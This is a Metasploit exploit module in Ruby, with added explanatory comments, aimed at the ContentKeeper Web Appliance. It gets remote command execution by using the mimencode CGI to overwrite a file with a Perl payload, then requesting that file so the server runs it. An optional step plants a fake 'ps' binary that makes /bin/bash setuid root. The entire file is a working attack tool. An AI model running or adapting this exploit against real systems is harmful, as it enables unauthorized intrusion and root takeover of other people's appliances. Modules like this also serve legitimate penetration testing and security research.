##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
##
# ContentKeeper Web Appliance remote command execution (versions prior to
# 125.10, per the module description). Two hand-built requests are used: a
# POST to the mimencode CGI whose body replaces the OVERWRITE file, then a
# GET of that file so the CGI handler executes it as the Apache user. The
# module uses the raw TCP mixin rather than the HTTP client mixin, so every
# header is assembled by hand in #exploit.
##
class Metasploit3 < Msf::Exploit::Remote

	Rank = ExcellentRanking

	# Supplies connect / sock / disconnect used by #check and #exploit.
	include Msf::Exploit::Remote::Tcp

	# Module metadata and datastore options.
	#
	# OVERWRITE      - name of the file under /cgi-bin/ck/ that receives the
	#                  generated Perl script. It is interpolated into the
	#                  request line as-is (no URL encoding), so a value with
	#                  spaces or '?' would yield a malformed request.
	# SkipEscalation - when false (the default) and a perl payload is selected,
	#                  the uploaded script also attempts to set the setuid bit
	#                  on /bin/bash (see #exploit).
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ContentKeeper Web Remote Command Execution',
			'Description'    => %q{
					This module exploits the ContentKeeper Web Appliance. Versions prior
				to 125.10 are affected. This module exploits a combination of weaknesses
				to enable remote command execution as the Apache user. By setting
				SkipEscalation to false, this module will attempt to setuid the bash shell.
			},
			'Author'         => [ 'patrick' ],
			'Arch'           => [ ARCH_CMD ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '54551' ],
					[ 'OSVDB', '54552' ],
					[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Platform'       => [ 'unix' ],
			'Targets'        =>
				[
					[ 'Automatic', { } ]
				],
			'DisclosureDate' => 'Feb 25 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(80),
				OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat' ]),
				OptBool.new("SkipEscalation", [ true, "Specify this to skip the root escalation attempt", false ]),
			], self.class)
	end

	# Sends a bare GET to the mimencode CGI and reports Vulnerable when the
	# response matches /500 Internal/. This is a coarse fingerprint: any 500
	# from that path matches, so Vulnerable means "mimencode is reachable and
	# errors on a bare request", not a confirmed affected version.
	def check
		connect
		sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
		# Arguments are passed straight to Rex's Stream#get; presumably read
		# timeouts — confirm against the Rex API. A nil response just fails the
		# match below (nil =~ regex is nil) and yields Safe.
		banner = sock.get(-1, 3)
		disconnect
		if (banner =~ /500 Internal/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	# Wraps the selected payload in a Perl CGI script, uploads it over the
	# OVERWRITE file through mimencode, then requests that file so the web
	# server runs it. Leaves artifacts on the target: the overwritten file, and
	# (escalation branch) a 'ps' file in the CGI directory plus a setuid
	# /bin/bash — the status messages at the end remind the operator to revert.
	def exploit
		exp = "#!/usr/bin/perl\n"
		exp << "print \"Content-type: text/html\\n\\n\";\n\n"
		exp << "use IO::Socket::INET;\n"
		# Branch on the payload *name*: perl payloads are spliced in as Perl
		# source, anything else is run through Perl's system().
		if (datastore['PAYLOAD'] =~ /perl/)
			if not datastore['SkipEscalation']
				print_status("Attempting to facilitate root escalation...")
				# Drops an executable 'ps' in the CGI directory that setuids
				# /bin/bash, prepends '.' to PATH and runs benetool; presumably
				# benetool resolves 'ps' via PATH with elevated rights — that is
				# the escalation primitive, inferred from the command, not shown here.
				exp << %q{system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;");} # We can use either 'ps' or 'grep' but ps is fine.
			end
			# Strip the 'perl -MIO -e ' wrapper and its quoting so the payload
			# body becomes inline Perl inside the script being built.
			exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!
		else
			# Only '"' is escaped here. Backslashes, '$' or '@' in the payload
			# would still be interpolated by Perl inside system("..."). Not a
			# trust boundary (the operator chose the payload), but a reason some
			# cmd payloads may fail on this branch.
			exp << "system(\""
			exp << payload.encoded.gsub('"', '\"')
			exp << "\");\n"
		end

		body = Rex::Text.encode_base64(exp)
		connect
		# Query string is passed as mimencode arguments; presumably -u decodes
		# the base64 body and -o writes the result to OVERWRITE (mimencode
		# flags — confirm against the tool).
		sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
		sploit << "Host: #{datastore['RHOST']}\r\n"
		# Content-Length covers only the base64 body; the CRLFCRLF appended in
		# the put below is not counted. Base64 is ASCII, so length == bytesize.
		sploit << "Content-Length: #{body.length}\r\n\r\n"
		print_status("Uploading payload to target...")
		sock.put(sploit + body + "\r\n\r\n")
		disconnect
		select(nil, nil, nil, 3) # Wait a few seconds.. (select with no fds is a plain sleep)
		print_status("Calling payload...")
		connect
		req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx
		req << "Host: #{datastore['RHOST']}\r\n"
		sock.put(req + "\r\n\r\n")
		# Hand off to the payload handler before the request socket is closed.
		handler
		disconnect
		select(nil, nil, nil, 3) # Wait for session creation.
		# Escalation success is inferred from session creation alone; the
		# setuid bit on /bin/bash is never verified from here.
		if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/
			print_status("Privilege escalation appears to have worked!")
			print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")
			print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
		end
	end
end